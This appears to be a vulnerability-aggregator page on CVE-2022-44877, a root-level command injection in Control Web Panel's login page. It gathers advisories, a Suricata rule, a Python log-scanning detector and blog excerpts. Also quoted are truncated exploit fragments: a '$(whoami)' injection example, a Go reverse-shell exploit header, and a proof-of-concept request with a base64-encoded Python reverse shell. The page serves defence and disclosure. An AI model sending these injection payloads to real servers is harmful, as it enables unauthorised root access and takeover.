CVE-2022-44877
Published: 2023-01-05
Priority: P196 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability, due 2023-02-07
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
login/index.php in CWP (aka Control Web Panel or CentOS Web Panel) 7 before 0.9.8.1147 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the login parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| control-webpanel | webpanel | < 0.9.8.1147 | 0.9.8.1147 |
Detection & IOCs
- Use the Nuclei template matcher: look for HTTP 302 responses with body containing 'Login Redirect.' in response to a crafted POST to /login/index.php with shell metacharacters in the login parameter.
- Fingerprint vulnerable CWP instances via Shodan or FOFA using the page title 'Login | Control WebPanel' before scanning for exploitation.
- Successful exploitation results in code execution as the root user; the HTTP request blocks while the command runs and results are not returned in the HTTP response, so use out-of-band (DNS/interactsh) detection.
- The vulnerability is triggered when double quotes are used to log incorrect login entries to the system, allowing bash command injection; monitor CWP authentication logs for anomalous entries containing shell metacharacters.
- Only CWP 7 versions before 0.9.8.1147 are vulnerable; instances already patched to 0.9.8.1147 or later are not affected.
- According to Wiz data, CWP is not prevalent in cloud environments, so the risk of exploitation in cloud deployments is lower than in on-premises environments.
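A log-review sketch for the monitoring hint above, added here as an example and not taken from any of the cited sources: it scans web access logs for requests to /login/index.php whose login parameter carries shell metacharacters. The combined-log-format layout, the function names and the sample lines are assumptions; the log format on a given CWP host may differ.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Request portion of a combined-log-format line (assumed layout).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Shell metacharacters that have no place in a user name.
# "&" is left out because it is the query-string delimiter.
SHELL_META_RE = re.compile(r'\$\(|\$\{|`|[;|<>]')


def login_values(query):
    """Yield each URL-decoded value of the `login` query parameter."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "login":
            yield unquote_plus(value)


def scan(lines):
    """Return one record per suspicious login request found in `lines`."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.match(line)
        if not match:
            continue
        parts = urlsplit(match["uri"])
        if not parts.path.endswith("/login/index.php"):
            continue
        for value in login_values(parts.query):
            if SHELL_META_RE.search(value):
                hits.append({"line": number, "ip": match["ip"],
                             "status": int(match["status"]), "login": value})
    return hits


# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [06/Jan/2023:10:01:02 +0000] "POST /login/index.php?login=$(whoami) HTTP/1.1" 302 15 "-" "curl/7.85.0"',
    '198.51.100.4 - - [06/Jan/2023:10:02:10 +0000] "POST /login/index.php?login=alice HTTP/1.1" 302 15 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Jan/2023:10:03:44 +0000] "POST /login/index.php?login=%24%28whoami%29 HTTP/1.1" 302 15 "-" "-"',
    '198.51.100.4 - - [06/Jan/2023:10:04:00 +0000] "GET /index.php?x=$(whoami) HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit only shows that a request with the pattern was received; whether the host was still on a version before 0.9.8.1147 at that time decides if it needs incident handling.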
CVSS provenance
- nvd · v3.1 · 9.8 · CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- vulncheck · 9.8 · CRITICAL
- cisa · 9.8 · CRITICAL
GHSA
GHSA-fxw7-8r5q-w2v4: RESERVED An issue in the /login/index
ghsa_unreviewed·2023-01-06
CVE-2022-44877 [CRITICAL] CWE-78 GHSA-fxw7-8r5q-w2v4: RESERVED An issue in the /login/index
RESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.
VulnCheck
CWP Control Web Panel OS Command Injection Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-44877 [CRITICAL] CWE-78 CWP Control Web Panel OS Command Injection Vulnerability
CWP Control Web Panel (formerly CentOS Web Panel) contains an OS command injection vulnerability that allows remote attackers to execute commands via shell metacharacters in the login parameter.
Affected: CWP Control Web Panel
Required Action: Apply updates per vendor instructions.
Exploitation References: https://infosec.exchange/@shadowserver/109670024784488102; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://unit42.paloaltonetworks.com/network-security-trends-nov-jan/; https://information.rapid7.com/rs/411-NAK-970/images/Rapid7-2023-Mid-Year-Threat-Review.pdf; https://www.rapid7.com/globalassets/_pdfs/research/rapid7_2024_attack_intelligence_report.pdf; https://sysdig.com/blog/cryst
CISA
CWP Control Web Panel OS Command Injection Vulnerability
cisa·2023-01-17·CVSS 9.8
CVE-2022-44877 [CRITICAL] CWE-78 CWP Control Web Panel OS Command Injection Vulnerability
Vulnerability: CWP Control Web Panel OS Command Injection Vulnerability
Affected: CWP Control Web Panel
CWP Control Web Panel (formerly CentOS Web Panel) contains an OS command injection vulnerability that allows remote attackers to execute commands via shell metacharacters in the login parameter.
Required Action: Apply updates per vendor instructions.
Notes: https://control-webpanel.com/changelog#1669855527714-450fb335-6194; https://nvd.nist.gov/vuln/detail/CVE-2022-44877
Remediation Due Date: 2023-02-07
Suricata
ET EXPLOIT CentOS Control Web Panel Pre-Auth Remote Code Execution (CVE-2022-44877)
suricata·2023-01-13·CVSS 9.8
CVE-2022-44877 [CRITICAL] ET EXPLOIT CentOS Control Web Panel Pre-Auth Remote Code Execution (CVE-2022-44877)
Rule: alert http any any -> $HOME_NET 2031 (msg:"ET EXPLOIT CentOS Control Web Panel Pre-Auth Remote Code Execution (CVE-2022-44877)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/login/index.php?login|3d 24|"; startswith; fast_pattern; http.cookie; content:"cwpsrv-"; http.request_body; content:"username="; startswith; content:"&password="; distance:0; content:"&commit=Login"; distance:0; endswith; reference:url,github.com/numanturle/CVE-2022-44877; reference:cve,2022-44877; classtype:attempted-admin; sid:2043302; rev:1; metadata:attack_target Server, created_at 2023_01_13, cve CVE_2022_44877, deployment Perimeter, deployment Datacenter, deployment SSLDecrypt, performance_im
Exploit-DB
Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
exploitdb·2023-04-05·CVSS 9.8
CVE-2022-44877 [CRITICAL] Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
---
// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)
// Date: 2023-02-02
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://centos-webpanel.com/
// Affected Versions: version < 0.9.8.1147
// Tested on: Kali Linux
// CVE : CVE-2022-44877
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7
// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020
package main
import (
"bytes"
"crypto/tls"
"fmt"
"net/http"
"flag"
"time"
)
func main() {
var host,call string
flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")
flag.Parse()
b
Exploit-DB
Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
exploitdb·2023-04-01·CVSS 9.8
CVE-2022-44877 [CRITICAL] Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
---
[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
Bash commands can be run because double quotes are used to log incorrect entries to the system.
Video Proof of Concept
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KH
Metasploit
CWP login.php Unauthenticated RCE
metasploit
Control Web Panel versions < 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.
Nuclei
CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-44877 [CRITICAL] CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution
CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary system commands via crafted HTTP requests and potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2022-44877
info:
  name: CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution
  author: For3stCo1d
  severity: critical
  description: |
    CentOS Web Panel 7 before 0.9.8.1147 is susceptible to remote code execution via entering shell characters in the /login/index.php component. This can allow an attacker to execute arbitrary sys
Unit42
Network Security Trends: November 2022-January 2023
blogs_unit42·2023-05-02·CVSS 9.8
CVE-2021-22005 [CRITICAL] Network Security Trends: November 2022-January 2023
## Network Security Trends: November 2022-January 2023
Yiheng An
Published: May 2, 2023
## Executive Summary
Recent observations of exploits used in the wild November 2022-January 2023 reveal that attackers have been using newly published remote code execution vulnerabilities in the following three products:
- Roxy-WI, a web interface for managing and monitoring RoxyDNS
- CWP, a free web hosting control panel (aka Control Web Panel or CentOS Web Panel)
- Cacti, an open-source network monitoring and graphing tool used to track the performance of various network devices, servers and applications
Additionally, attackers have also been taking advantage of a traversal and information disclosure vulnerability in ThoughtWorks GoCD to read sensitive files stored on servers.
In our observations of network security trends, Unit 42 researchers have pinpointed several attacks based o
Wiz
#1 - CI/CD Supply Chain Attack | Wiz
blogs_wiz·2023-04-30·CVSS 9.8
CVE-2022-44877 [CRITICAL] #1 - CI/CD Supply Chain Attack | Wiz
Podcast
## #1 - CI/CD Supply Chain Attack
## Resources
just CircleCI incident report for January 4, 2023 security incident
CVE-2022-44877, critical RCE in CentOS Control Web Panel exploited in the wild
U.S. airline accidentally exposes ‘No Fly List’ on unsecured server
Hackers exploiting vulnerability affecting Zoho ManageEngine products: Rapid7
LastPass owner GoTo shares more bad news about November’s security breach
Sentinelone
CVE-2022-44877: CentOS Control Web Panel Unauthenticated RCE
blogs_sentinelone·2023-02-24·CVSS 9.8
CVE-2022-44877 [CRITICAL] CVE-2022-44877: CentOS Control Web Panel Unauthenticated RCE
CVE-2022-44877, an unauthenticated remote code execution flaw in Control Web Panel (CWP), formerly known as CentOS Web Panel. This vulnerability was first discovered by security researcher Numan Türle, who published a proof-of-concept exploit for it on January 3, 2023.
## About the CVE-2022-44877
The vulnerability arises from a condition allowing attackers to run bash commands when double quotes are used to log incorrect entries to the system. Successful exploitation allows remote attackers to execute arbitrary operating system commands via shell metacharacters in the login parameter (login/index.php).
This vulnerability was fixed in an October 2022 release of CWP. On January 6, 2023, security nonprofit Shadowserver reported exploitation in the wild. As of January 19, 2023, security fir
Sentinelone
CVE-2023-0669: Fortra GoAnywhere MFT RCE Vulnerability
blogs_sentinelone·2023-02-21·CVSS 7.2
CVE-2023-0669 [HIGH] CVE-2023-0669: Fortra GoAnywhere MFT RCE Vulnerability
In February 2023, Fortra notified users about a zero-day remote code vulnerability in the GoAnywhere MFT. The vendor provided an immediate response with mitigations and indicators of compromise. However, a week later, they released a patch.
It is claimed that over 1,000 instances of GoAnywhere are accessible through the internet. However, in order to exploit them, one needs to have access to the admin console of the application.
## About the CVE-2023-0669 vulnerability
CVE-2023-0669 is related to a pre-authentication command injection in GoAnywhere MFT, affecting version 7.1.1 and its earlier versions. If the vulnerability is successfully exploited, attackers can remotely execute code on vulnerable instances of GoAnywhere MFT.
The vulnerability has been marked as High. The CVSS score
Wiz
CVE-2022-44877, critical RCE in CentOS Control Web Panel exploited in the wild: everything you need to know | Wiz Blog
blogs_wiz·2023-01-17·CVSS 9.8
CVE-2022-44877 [CRITICAL] CVE-2022-44877, critical RCE in CentOS Control Web Panel exploited in the wild: everything you need to know | Wiz Blog
CVE-2022-44877, a critical RCE vulnerability in Control Web Panel 7 (also known as CentOS Web Panel), has been reportedly exploited in the wild. The vulnerability could allow an unauthenticated attacker to escalate privileges and execute code remotely on susceptible servers. Although the vulnerability was published and assigned a CVE on January 6, a fix has been available since October 25, 2022. It was assigned a CVSS score of 9.8.
Exploitation attempts reportedly began around January 6, closely following the publication of a public proof of concept.
## What is CVE-2022-44877?
In unpatched versions of CWP, there is a flaw that allows the execution of Bash commands if double quotation marks are used when logging incorrect entries into the system. This flaw could enable an attacker to exe
## Wiz Research data: what is the risk to cloud environments?
According to Wiz data, CWP is not prevalent in cloud environments and therefore there is a lower risk of CVE-2022-44877 exploitation in such en
References
- http://packetstormsecurity.com/files/170388/Control-Web-Panel-7-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/170820/Control-Web-Panel-Unauthenticated-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/171725/Control-Web-Panel-7-CWP7-0.9.8.1147-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2023/Jan/1
- https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386
- https://www.youtube.com/watch?v=kiLfSvc1SYY
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-44877
Timeline
- 2023-01-05: Published
- 2023-01-17: Added to CISA KEV
Exploited in the wild